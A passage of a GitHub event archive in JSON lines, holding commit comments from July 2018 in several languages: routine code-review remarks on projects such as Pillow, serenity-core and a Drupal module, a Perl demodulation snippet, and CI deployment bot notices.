hatte ich noch ohne diese Änderungen.\r\n```\r\n\t\t\t\t\t#Find next position of valid signal (skip invalid pieces)\r\n\t\t\t\t\tmy $regex=\".{$i}\".$startStr.$signal_regex;\r\n\t\t\t\t\tDebug \"$name: searching new start with ($regex)\\n\" if ($debug);\r\n\t\t\t\t\t\r\n\t\t\t\t\tif ($rawData =~ m/$regex/) {\r\n\t\t\t\t\t\tDebug \"found pos: \" . $-[0] if ($debug);\r\n\t\t\t\t\t\t$i=$-[0] + $i + length($startStr);\r\n\t\t\t\t\t\t$i=$i-$signal_width if ($i >= $signal_width);\r\n\t\t\t\t\t\tDebug \"$name: found restart at Position $i ($regex)\\n\" if ($debug);\r\n\t\t\t\t\t\tlast if ((length($rawData) - $i) < 10);\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\tlast;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t\tSIGNALduino_Log3 $name, 5, \"$name: restarting demodulation at Position $i+$signal_width\";\r\n```\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-04T11:57:07Z"}
{"id":"7918038309","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594219,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-04T11:57:30Z","updated_at":"2018-07-04T11:57:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T11:57:30Z"}
{"id":"7918038731","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-bdd/serenity-core"},"payload":{"comment":{"id":29594221,"position":null,"line":null,"path":null,"commit_id":"badc7517a9afdeee96c4dac589815e84507031fb","created_at":"2018-07-04T11:57:36Z","updated_at":"2018-07-04T11:57:36Z","author_association":"CONTRIBUTOR","body":"I take your point -  I will roll back the Cucumber 3 integration and re-release it with a new version number"}},"created_at":"2018-07-04T11:57:36Z"}
{"id":"7918039833","type":"CommitCommentEvent","actor":{"login":"Menollo"},"repo":{"name":"python-pillow/Pillow"},"payload":{"comment":{"id":29594225,"position":null,"line":null,"path":null,"commit_id":"36be37c5c56ae042b3a35e3abf3d59061c0e1162","created_at":"2018-07-04T11:57:51Z","updated_at":"2018-07-04T11:57:51Z","author_association":"NONE","body":"This change breaks running Pillow with PYTHONOPTIMIZE=2 because that strips the _ _ doc _ _ variable: **import PIL** gives the Exception: **AttributeError: 'NoneType' object has no attribute 'format'** (because of line 27)\r\n"}},"created_at":"2018-07-04T11:57:51Z"}
{"id":"7918040163","type":"CommitCommentEvent","actor":{"login":"DDT-Kibe"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29594226,"position":null,"line":null,"path":null,"commit_id":"219f9eb4c6c60e152d4ec6c85f5143a57249baec","created_at":"2018-07-04T11:57:55Z","updated_at":"2018-07-04T11:57:55Z","author_association":"OWNER","body":"浅田さん\r\nご確認ありがとうございます。"}},"created_at":"2018-07-04T11:57:55Z"}
{"id":"7918044411","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29594228,"position":null,"line":null,"path":null,"commit_id":"5845ba480747eaad26aa1c9f8b3f847abf5be957","created_at":"2018-07-04T11:58:49Z","updated_at":"2018-07-04T11:58:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180704-115842 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180704-115842\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-04T11:58:49Z"}
{"id":"7918046608","type":"CommitCommentEvent","actor":{"login":"DarrylZero"},"repo":{"name":"DarrylZero/json.compare"},"payload":{"comment":{"id":29594229,"position":null,"line":null,"path":null,"commit_id":"daee12cfbbacbdb991b19a597307bb2549ec0bf5","created_at":"2018-07-04T11:59:17Z","updated_at":"2018-07-04T11:59:17Z","author_association":"OWNER","body":"Next time please write comments and commit description in english.It might be read by those who is not familiar to russian language"}},"created_at":"2018-07-04T11:59:17Z"}
{"id":"7918049310","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-bdd/serenity-core"},"payload":{"comment":{"id":29594264,"position":30,"line":51,"path":"serenity-core/src/main/java/net/thucydides/core/steps/StepEventBus.java","commit_id":"487a8764926f60e8916e0932b4988fd23f49f56b","created_at":"2018-07-04T11:59:50Z","updated_at":"2018-07-04T11:59:50Z","author_association":"CONTRIBUTOR","body":"You are correct, this is unnecessary."}},"created_at":"2018-07-04T11:59:50Z"}
{"id":"7918052582","type":"CommitCommentEvent","actor":{"login":"stefanpolzer"},"repo":{"name":"mpay24/mpay24-php"},"payload":{"comment":{"id":29594278,"position":null,"line":null,"path":null,"commit_id":"1b38315ae3df610f7cdd85312152f3505dab1848","created_at":"2018-07-04T12:00:30Z","updated_at":"2018-07-04T12:00:30Z","author_association":"CONTRIBUTOR","body":"I do not agree with this solution. Just removing PHP versions that do not pass travic ci. The Minimum Version is 5.3.3 ... if this is still valid we should try to find a way that Travis CI will Pass *ALL* official supporter versions, right? The Next step should be to add as many Tests as possible to make this tests more reliable.  I would be willing to help here!"}},"created_at":"2018-07-04T12:00:30Z"}
{"id":"7918056310","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29594284,"position":null,"line":null,"path":null,"commit_id":"fee538fe5b5fc91129adfe50a104aa83cb2776e0","created_at":"2018-07-04T12:01:15Z","updated_at":"2018-07-04T12:01:15Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-240](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-240).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-240-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T12:01:15Z"}
{"id":"7918060254","type":"CommitCommentEvent","actor":{"login":"MarkusLaut"},"repo":{"name":"contentful/extensions"},"payload":{"comment":{"id":29594292,"position":165,"line":125,"path":"README.md","commit_id":"a368f0c51744c38811423b1098aa8bdc8dc2e6d7","created_at":"2018-07-04T12:02:06Z","updated_at":"2018-07-04T12:02:06Z","author_association":"NONE","body":"@floelhoeffel I think there is something missing here"}},"created_at":"2018-07-04T12:02:06Z"}
{"id":"7918062416","type":"CommitCommentEvent","actor":{"login":"kovalp"},"repo":{"name":"cfm-mpc/pyscf"},"payload":{"comment":{"id":29594297,"position":null,"line":null,"path":null,"commit_id":"8597c39697d1cb6600a55fcfb97990fe8fd4a850","created_at":"2018-07-04T12:02:32Z","updated_at":"2018-07-04T12:02:32Z","author_association":"COLLABORATOR","body":"I need some more explanation for myself and for the pull request."}},"created_at":"2018-07-04T12:02:32Z"}
{"id":"7918062695","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"ryantm/nixpkgs-update"},"payload":{"comment":{"id":29594299,"position":33,"line":28,"path":"src/GitHub.hs","commit_id":"07aaa9f5bc2dac5787aa170e1944a208539d777b","created_at":"2018-07-04T12:02:36Z","updated_at":"2018-07-04T12:02:36Z","author_association":"NONE","body":"Some packages use `fetchgit` with `git://github.com`."}},"created_at":"2018-07-04T12:02:36Z"}
{"id":"7918063900","type":"CommitCommentEvent","actor":{"login":"sabry"},"repo":{"name":"JacquesCarette/pi-dual"},"payload":{"comment":{"id":29594303,"position":101,"line":514,"path":"survey/survey.tex","commit_id":"25e7bff13cfd12feb6734cb7b9f6e0876b340307","created_at":"2018-07-04T12:02:52Z","updated_at":"2018-07-04T12:02:52Z","author_association":"COLLABORATOR","body":"We could move that part to the end of Sec 3 if you think it would read better. —Amr\n\n> On Jul 4, 2018, at 07:46, Jacques Carette <notifications@github.com> wrote:\n> \n> Do we really want to give away the \"punchline\" to section 3 right away in the introduction? It's the only part of this new material that I'm not so sure about.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/JacquesCarette/pi-dual/commit/25e7bff13cfd12feb6734cb7b9f6e0876b340307#commitcomment-29594058>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AC1a6fm3NNk4mrmhYuLf2WDrMI5GBUx1ks5uDKsggaJpZM4VCcly>.\n> \n\n"}},"created_at":"2018-07-04T12:02:52Z"}
{"id":"7918065395","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594307,"position":22,"line":60,"path":"Assets/Prefabs/UI/ItemRank.prefab","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:03:13Z","updated_at":"2018-07-04T12:03:13Z","author_association":"NONE","body":"Já que está mantendo em pt-br, não seria `TextoColoca`?"}},"created_at":"2018-07-04T12:03:13Z"}
{"id":"7918073082","type":"CommitCommentEvent","actor":{"login":"nomasprime"},"repo":{"name":"thoughtbot/json_matchers"},"payload":{"comment":{"id":29594324,"position":null,"line":null,"path":null,"commit_id":"2c404e284651595b69f84c68252d99f1a7435e5d","created_at":"2018-07-04T12:04:57Z","updated_at":"2018-07-04T12:04:57Z","author_association":"NONE","body":"Used to be able to pass `record_errors: true` which was really useful because it gave debug info for invalid JSON schemas. With options removed this debug doesn't work, suggestions?"}},"created_at":"2018-07-04T12:04:57Z"}
{"id":"7918077783","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/pi-dual"},"payload":{"comment":{"id":29594337,"position":101,"line":514,"path":"survey/survey.tex","commit_id":"25e7bff13cfd12feb6734cb7b9f6e0876b340307","created_at":"2018-07-04T12:06:03Z","updated_at":"2018-07-04T12:06:03Z","author_association":"OWNER","body":"Most of that is already mentioned there, but could be augmented. Some of the text you wrote here would fit well in the conclusion as well. I'll be working on the paper this morning, I can move it."}},"created_at":"2018-07-04T12:06:03Z"}
{"id":"7918080063","type":"CommitCommentEvent","actor":{"login":"gavlyukovskiy"},"repo":{"name":"visyagin/BTreeClosestLeaf"},"payload":{"comment":{"id":29594340,"position":33,"line":33,"path":"src/com/visyagin/btree/entity/BinaryTree.java","commit_id":"9293e48115d579003ac976904cd3168a56b90325","created_at":"2018-07-04T12:06:34Z","updated_at":"2018-07-04T12:06:34Z","author_association":"NONE","body":"Yes, I understood that, but I meant if we already found nearest leaf with distance 3 (resultPath.size() == 3) and now we're processing next node and its list of parents has more elements (newPath.size() == 4) than closest one, what can we do in this case?"}},"created_at":"2018-07-04T12:06:34Z"}
{"id":"7918080321","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"ryantm/nixpkgs-update"},"payload":{"comment":{"id":29594341,"position":33,"line":28,"path":"src/GitHub.hs","commit_id":"07aaa9f5bc2dac5787aa170e1944a208539d777b","created_at":"2018-07-04T12:06:38Z","updated_at":"2018-07-04T12:06:38Z","author_association":"NONE","body":"Oops, with `fetchgit` you would split `owner` and `repo` from the URL, but take `rev` from the attribute."}},"created_at":"2018-07-04T12:06:38Z"}
{"id":"7918084652","type":"CommitCommentEvent","actor":{"login":"Sivaraman-R"},"repo":{"name":"Sivaraman-R/DemoVSTS"},"payload":{"comment":{"id":29594359,"position":null,"line":null,"path":null,"commit_id":"8fbe0c3d88a4d2c73e98bb07a9b2f16955796ed5","created_at":"2018-07-04T12:07:32Z","updated_at":"2018-07-04T12:07:32Z","author_association":"OWNER","body":"Aprpvoed"}},"created_at":"2018-07-04T12:07:32Z"}
{"id":"7918088138","type":"CommitCommentEvent","actor":{"login":"fertant"},"repo":{"name":"adeon96/drupal_mentoring"},"payload":{"comment":{"id":29594368,"position":13,"line":292,"path":"web/modules/custom/generating_entities_module/src/Entity/MyContentEntity.php","commit_id":"37ed2bea3f0a8405b53b18a55704505b5ba022b7","created_at":"2018-07-04T12:08:20Z","updated_at":"2018-07-04T12:08:20Z","author_association":"NONE","body":"Зачем нужна эта строка? Может стоит ее удалить?"}},"created_at":"2018-07-04T12:08:20Z"}
{"id":"7918090434","type":"CommitCommentEvent","actor":{"login":"sfrieson"},"repo":{"name":"sfrieson/class-practice"},"payload":{"comment":{"id":29594378,"position":18,"line":59,"path":"index.html","commit_id":"ef28ea2fad8895eeca3ab83acc3c4fb82942e2a2","created_at":"2018-07-04T12:08:52Z","updated_at":"2018-07-04T12:08:52Z","author_association":"OWNER","body":"Remove button class - won't be necessary for JavaScript."}},"created_at":"2018-07-04T12:08:52Z"}
{"id":"7918091735","type":"CommitCommentEvent","actor":{"login":"mbiebl"},"repo":{"name":"RonaldCarter/PHPManager"},"payload":{"comment":{"id":29594380,"position":null,"line":null,"path":null,"commit_id":"9b6411cf633920b795f8aeaeb8f0ae1d6c171d80","created_at":"2018-07-04T12:09:10Z","updated_at":"2018-07-04T12:09:10Z","author_association":"NONE","body":"I first wondered, if it would make sense to only drop ```track_errors``` if PHP 7.2 or later is used.\r\nBut since the documentation at http://php.net/manual/en/migration72.deprecated.php says, that ```error_get_last()``` should be used which is available since PHP 5.2 (http://php.net/manual/en/function.error-get-last.php), it's probably safe to drop track_errors unconditionally."}},"created_at":"2018-07-04T12:09:10Z"}
{"id":"7918095391","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594393,"position":29,"line":29,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:10:00Z","updated_at":"2018-07-04T12:10:00Z","author_association":"NONE","body":"extraia o código que retorna um boolean para um método indicando o que ele significa, por exemplo, tocarNaTeclaA"}},"created_at":"2018-07-04T12:10:00Z"}
{"id":"7918096382","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594398,"position":39,"line":39,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:10:13Z","updated_at":"2018-07-04T12:10:13Z","author_association":"NONE","body":"Extrair um método também aqui"}},"created_at":"2018-07-04T12:10:13Z"}
{"id":"7918096594","type":"CommitCommentEvent","actor":{"login":"juanjp600"},"repo":{"name":"juanjp600/scpcb"},"payload":{"comment":{"id":29594399,"position":136,"line":156,"path":"Blitz2CPP/Blitz2CPP/FileParser.cs","commit_id":"72391b176acd288ee57ec67bbbb0eaa9ce66183c","created_at":"2018-07-04T12:10:15Z","updated_at":"2018-07-04T12:10:15Z","author_association":"OWNER","body":"Blitz3D's Not is bitwise - use ~ instead"}},"created_at":"2018-07-04T12:10:15Z"}
{"id":"7918098488","type":"CommitCommentEvent","actor":{"login":"juanjp600"},"repo":{"name":"juanjp600/scpcb"},"payload":{"comment":{"id":29594411,"position":138,"line":158,"path":"Blitz2CPP/Blitz2CPP/FileParser.cs","commit_id":"72391b176acd288ee57ec67bbbb0eaa9ce66183c","created_at":"2018-07-04T12:10:40Z","updated_at":"2018-07-04T12:10:40Z","author_association":"OWNER","body":"Same with And and Or"}},"created_at":"2018-07-04T12:10:40Z"}
{"id":"7918099328","type":"CommitCommentEvent","actor":{"login":"Batchetty"},"repo":{"name":"muggot/openmcu"},"payload":{"comment":{"id":29594413,"position":null,"line":null,"path":null,"commit_id":"1a1e76472eac78041fea554943d15ebf954033f4","created_at":"2018-07-04T12:10:51Z","updated_at":"2018-07-04T12:10:51Z","author_association":"NONE","body":"Что случилось с сайтами проекта openMCU ? =(\r\nГде сейчас можно скачать openmcu под windows, linux и инструкцию по настройке ?"}},"created_at":"2018-07-04T12:10:51Z"}
{"id":"7918102041","type":"CommitCommentEvent","actor":{"login":"fertant"},"repo":{"name":"adeon96/drupal_mentoring"},"payload":{"comment":{"id":29594421,"position":32,"line":51,"path":"web/modules/custom/generating_entities_module/src/MyContentEntityListBuilder.php","commit_id":"37ed2bea3f0a8405b53b18a55704505b5ba022b7","created_at":"2018-07-04T12:11:28Z","updated_at":"2018-07-04T12:11:28Z","author_association":"NONE","body":"Я просил тебя проинжектировать languageManager через DI в constructor и не следуешь Drupal coding standard\r\nhttps://www.drupal.org/docs/develop/standards"}},"created_at":"2018-07-04T12:11:28Z"}
{"id":"7918102300","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/muscat"},"payload":{"comment":{"id":29594422,"position":4,"line":71,"path":"app/models/ability.rb","commit_id":"cdc1e96c2aa432e101c6b26c6987fcebb31f9f2e","created_at":"2018-07-04T12:11:31Z","updated_at":"2018-07-04T12:11:31Z","author_association":"CONTRIBUTOR","body":"This is the owner of the folder. But a folder can contain sources from somebody else. Is this taken into account?"}},"created_at":"2018-07-04T12:11:31Z"}
{"id":"7918103301","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594426,"position":50,"line":50,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:11:44Z","updated_at":"2018-07-04T12:11:44Z","author_association":"NONE","body":"Extraia um método indicando o que está verificando aqui, por exemplo, temTarefaDeEspera"}},"created_at":"2018-07-04T12:11:44Z"}
{"id":"7918104016","type":"CommitCommentEvent","actor":{"login":"fertant"},"repo":{"name":"adeon96/drupal_mentoring"},"payload":{"comment":{"id":29594428,"position":40,"line":59,"path":"web/modules/custom/generating_entities_module/src/MyContentEntityListBuilder.php","commit_id":"37ed2bea3f0a8405b53b18a55704505b5ba022b7","created_at":"2018-07-04T12:11:54Z","updated_at":"2018-07-04T12:11:54Z","author_association":"NONE","body":"Drupal coding standard"}},"created_at":"2018-07-04T12:11:54Z"}
{"id":"7918105276","type":"CommitCommentEvent","actor":{"login":"BassT112"},"repo":{"name":"peos3/RotEqNet"},"payload":{"comment":{"id":29594432,"position":64,"line":201,"path":"src/framework/utils/utils.py","commit_id":"dbfaf2ad0546f668937e654f01902b2e500e0e5d","created_at":"2018-07-04T12:12:11Z","updated_at":"2018-07-04T12:12:11Z","author_association":"COLLABORATOR","body":"Questionmark?"}},"created_at":"2018-07-04T12:12:11Z"}
{"id":"7918105426","type":"CommitCommentEvent","actor":{"login":"villagedefrance"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29594433,"position":null,"line":null,"path":null,"commit_id":"4c67a70ae741c7d0be423b8077e6464e7b56c381","created_at":"2018-07-04T12:12:13Z","updated_at":"2018-07-04T12:12:13Z","author_association":"OWNER","body":"I have posted an improved Search commit but the issue of multiple words is not resolved yet."}},"created_at":"2018-07-04T12:12:13Z"}
{"id":"7918109657","type":"CommitCommentEvent","actor":{"login":"mdaskalov"},"repo":{"name":"mpay24/mpay24-php"},"payload":{"comment":{"id":29594448,"position":null,"line":null,"path":null,"commit_id":"1b38315ae3df610f7cdd85312152f3505dab1848","created_at":"2018-07-04T12:13:10Z","updated_at":"2018-07-04T12:13:10Z","author_association":"CONTRIBUTOR","body":"Agree, it should work for all supported versions. I will make a separate branch for that.\r\nHave no idea why it fails under 5.5 - for me it seems, that travis has no PHPUnit installed:\r\n`PHP Fatal error:  Class 'PHPUnit\\Framework\\TestCase' not found`\r\nMore test cases would be nice. Thank you!  "}},"created_at":"2018-07-04T12:13:10Z"}
{"id":"7918113650","type":"CommitCommentEvent","actor":{"login":"marv0810"},"repo":{"name":"peos3/RotEqNet"},"payload":{"comment":{"id":29594455,"position":64,"line":201,"path":"src/framework/utils/utils.py","commit_id":"dbfaf2ad0546f668937e654f01902b2e500e0e5d","created_at":"2018-07-04T12:14:02Z","updated_at":"2018-07-04T12:14:02Z","author_association":"COLLABORATOR","body":"i tried to my codestil to yours "}},"created_at":"2018-07-04T12:14:02Z"}
{"id":"7918115909","type":"CommitCommentEvent","actor":{"login":"BassT112"},"repo":{"name":"peos3/RotEqNet"},"payload":{"comment":{"id":29594462,"position":64,"line":201,"path":"src/framework/utils/utils.py","commit_id":"dbfaf2ad0546f668937e654f01902b2e500e0e5d","created_at":"2018-07-04T12:14:33Z","updated_at":"2018-07-04T12:14:33Z","author_association":"COLLABORATOR","body":"> i tried to my codestil to yours\r\nEnglish?"}},"created_at":"2018-07-04T12:14:33Z"}
{"id":"7918116467","type":"CommitCommentEvent","actor":{"login":"juanjp600"},"repo":{"name":"juanjp600/scpcb"},"payload":{"comment":{"id":29594467,"position":187,"line":205,"path":"Blitz2CPP/Blitz2CPP/FileParser.cs","commit_id":"72391b176acd288ee57ec67bbbb0eaa9ce66183c","created_at":"2018-07-04T12:14:41Z","updated_at":"2018-07-04T12:14:41Z","author_association":"OWNER","body":"public and private keywords do not exist outside of classes/structs. Functions that are forward-declared like this are always public."}},"created_at":"2018-07-04T12:14:41Z"}
{"id":"7918118933","type":"CommitCommentEvent","actor":{"login":"xhero"},"repo":{"name":"rism-ch/muscat"},"payload":{"comment":{"id":29594473,"position":4,"line":71,"path":"app/models/ability.rb","commit_id":"cdc1e96c2aa432e101c6b26c6987fcebb31f9f2e","created_at":"2018-07-04T12:15:16Z","updated_at":"2018-07-04T12:15:16Z","author_association":"CONTRIBUTOR","body":"yes, manage is only for the owner (i.e. delete the folder), but all the cataloguers are blocked on all the actions (publish, unpublish, \r\n and reindex)"}},"created_at":"2018-07-04T12:15:16Z"}
{"id":"7918119833","type":"CommitCommentEvent","actor":{"login":"eslavov11"},"repo":{"name":"arcadius/java-rest-api-web-container-benchmark"},"payload":{"comment":{"id":29594477,"position":null,"line":null,"path":null,"commit_id":"458f3238a8456cec0c8233451d818da56569689e","created_at":"2018-07-04T12:15:26Z","updated_at":"2018-07-04T12:15:26Z","author_association":"NONE","body":"Hello, have you configured Spring Security with Grizzly? I've been trying and the requests don't seem to be intercepted. Is there something special that you need to configure that I'm missing?"}},"created_at":"2018-07-04T12:15:26Z"}
{"id":"7918121911","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594480,"position":52,"line":52,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:15:50Z","updated_at":"2018-07-04T12:15:50Z","author_association":"NONE","body":"o nome espera parece bem abstrato nesse caso, faz sentido se for acaoDeEspera ou algo com mais descrição?"}},"created_at":"2018-07-04T12:15:50Z"}
{"id":"7918123933","type":"CommitCommentEvent","actor":{"login":"visyagin"},"repo":{"name":"visyagin/BTreeClosestLeaf"},"payload":{"comment":{"id":29594486,"position":33,"line":33,"path":"src/com/visyagin/btree/entity/BinaryTree.java","commit_id":"9293e48115d579003ac976904cd3168a56b90325","created_at":"2018-07-04T12:16:12Z","updated_at":"2018-07-04T12:16:12Z","author_association":"OWNER","body":"If I am not mistaken, you advised me to add such checking here?\r\nif (!resultPath.isEmpty() && newPath.size() >= resultPath.size()) {\r\n     return;\r\n}\r\nActually, yes, it makes sense.\r\nI didn't think about that."}},"created_at":"2018-07-04T12:16:12Z"}
{"id":"7918124418","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29594491,"position":4,"line":1996,"path":"src/CodeGen_Hexagon.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-04T12:16:19Z","updated_at":"2018-07-04T12:16:19Z","author_association":"COLLABORATOR","body":"I think the code is simply checking that while calculating the size we are not running into overflow. The code expects it to be 32 b only. Should we not check for overflow here"}},"created_at":"2018-07-04T12:16:19Z"}
{"id":"7918124858","type":"CommitCommentEvent","actor":{"login":"marv0810"},"repo":{"name":"peos3/RotEqNet"},"payload":{"comment":{"id":29594493,"position":64,"line":201,"path":"src/framework/utils/utils.py","commit_id":"dbfaf2ad0546f668937e654f01902b2e500e0e5d","created_at":"2018-07-04T12:16:25Z","updated_at":"2018-07-04T12:16:25Z","author_association":"COLLABORATOR","body":"i tried to fit my codestil on yours"}},"created_at":"2018-07-04T12:16:25Z"}
{"id":"7918125313","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594495,"position":58,"line":58,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:16:31Z","updated_at":"2018-07-04T12:16:31Z","author_association":"NONE","body":"aqui pode substituir com o método extraído "}},"created_at":"2018-07-04T12:16:31Z"}
{"id":"7918128782","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594508,"position":61,"line":61,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:17:18Z","updated_at":"2018-07-04T12:17:18Z","author_association":"NONE","body":"aqui extrai para um outro método indicando que está sendo feito, por exemplo, removerAcaoDeEspera ou algo do gênero\r\n"}},"created_at":"2018-07-04T12:17:18Z"}
{"id":"7918128979","type":"CommitCommentEvent","actor":{"login":"Sslaxx"},"repo":{"name":"Sslaxx/GodotSonicEngine"},"payload":{"comment":{"id":29594509,"position":null,"line":null,"path":null,"commit_id":"a71c7571f4e23065d66c1b893ed57374763203e6","created_at":"2018-07-04T12:17:20Z","updated_at":"2018-07-04T12:17:20Z","author_association":"OWNER","body":"Sonic/Freedom Planet-style play still."}},"created_at":"2018-07-04T12:17:20Z"}
{"id":"7918130606","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594513,"position":63,"line":63,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:17:41Z","updated_at":"2018-07-04T12:17:41Z","author_association":"NONE","body":"Extrair para constante"}},"created_at":"2018-07-04T12:17:41Z"}
{"id":"7918131640","type":"CommitCommentEvent","actor":{"login":"tinect"},"repo":{"name":"tinect/TinectMailArchive"},"payload":{"comment":{"id":29594516,"position":45,"line":92,"path":"Controllers/Backend/Mailarchive.php","commit_id":"1f608a95fcb0b0e94ce34397806af99db59675f3","created_at":"2018-07-04T12:17:55Z","updated_at":"2018-07-04T12:17:55Z","author_association":"OWNER","body":"correct, man :-) Thanks. Changed in https://github.com/tinect/TinectMailArchive/commit/80dd346a6e0b794adcff3a46306d6d415d853853"}},"created_at":"2018-07-04T12:17:55Z"}
{"id":"7918134976","type":"CommitCommentEvent","actor":{"login":"iGormilhit"},"repo":{"name":"rero/reroils-data"},"payload":{"comment":{"id":29594524,"position":5,"line":61,"path":"reroils_data/items/form_options/items/item-v0.0.1.json","commit_id":"4e4b8321b178c69170a8b5b9dfebcc0bcc1ab610","created_at":"2018-07-04T12:18:36Z","updated_at":"2018-07-04T12:18:36Z","author_association":"CONTRIBUTOR","body":"`call_Number` is wrong. Should be `call_number`. The creation of the item fails."}},"created_at":"2018-07-04T12:18:36Z"}
{"id":"7918135232","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29594526,"position":null,"line":null,"path":null,"commit_id":"ffb42c183666f8a47e820378cd1be0c1db51d327","created_at":"2018-07-04T12:18:40Z","updated_at":"2018-07-04T12:18:40Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-243](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-243).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-243-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T12:18:40Z"}
